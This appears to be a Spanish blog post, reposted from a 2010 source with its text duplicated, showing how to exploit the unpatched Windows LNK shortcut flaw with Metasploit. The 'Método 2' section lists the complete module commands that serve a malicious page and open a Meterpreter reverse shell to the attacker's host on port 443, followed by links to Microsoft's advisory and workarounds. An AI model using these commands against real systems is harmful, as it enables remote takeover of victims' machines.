Explotando "LNK" con Metasploit - Método 1
[*] - Explotando "LNK" con Metasploit - Método 1
[*] - Explotando "LNK" con Metasploit - Método 2
Metasploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
[*] Microsoft Security Advisory (2286198)
[*] Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software
Información extraída de:
http://www.kungfoosion.com/2010/07/explotando-lnk-con-metasploit.html
[*] - Explotando "LNK" con Metasploit - Método 2
Metasploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute set SRVHOST 192.168.162.136 set SRVPORT 80 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.162.136 set LPORT 443 exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
[*] Microsoft Security Advisory (2286198)
[*] Security By Default: Solución a la vulnerabilidad "LNK" de Windows mediante Directivas de Restricción de Software
Información extraída de:
http://www.kungfoosion.com/2010/07/explotando-lnk-con-metasploit.html
Comentarios
Publicar un comentario
Siéntase libre de dejar su comentario a continuación...